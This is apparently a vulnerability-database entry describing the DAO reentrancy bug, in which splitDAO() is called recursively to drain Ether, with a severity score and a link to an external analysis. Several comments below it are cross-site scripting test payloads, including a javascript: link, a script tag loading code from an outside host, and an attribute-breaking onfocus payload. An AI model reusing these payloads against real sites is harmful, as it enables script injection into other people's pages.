Back to Vulnerability database

The DAO Reentrancy

ID Submit date Publish date Author Score
1 10.25.2018 10.25.2018 10.0

Description

The bug is that when splitDAO() is called, it will then call the recipients code to transfer Ethereum coin, after which the recipients code will call splitDAO() again before finishing. This causes the process to repeat itself, transferring more Ethereum coin, then calling splitDAO() again, which calls the hacker's code, which calls splitDAO(), which calls the hacker's code, and so on. The process will continue endlessly, until it drains all of TheDAO's coin. BVSS:1.1/B:S/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H/CI:N/II:H/AI:N

Proof of concept

http://hackingdistributed.com/2016/06/18/analysis-of-the-dao-exploit/

Attachments

Comments


November, 2 01:34pm

nice

jd
@fixit November, 18 10:26am

S

December, 23 03:12am

nic

zs
@zseano January, 10 11:25pm
@Arbin January, 15 01:04pm

<a href=javascript:alert(1);//>nice 2</a>

@Arbin January, 15 01:06pm

<a>x</a>

@Abzi February, 26 03:58pm

cool

Se
@Sellvamanoj April, 1 08:22am

14.rs

Se
@Sellvamanoj April, 1 08:23am

<script src=//14.rs></script>

Se
@Sellvamanoj April, 1 08:23am

"'--!><Input Type=Text AutoFocus Onfocus=confirm13 <!--//#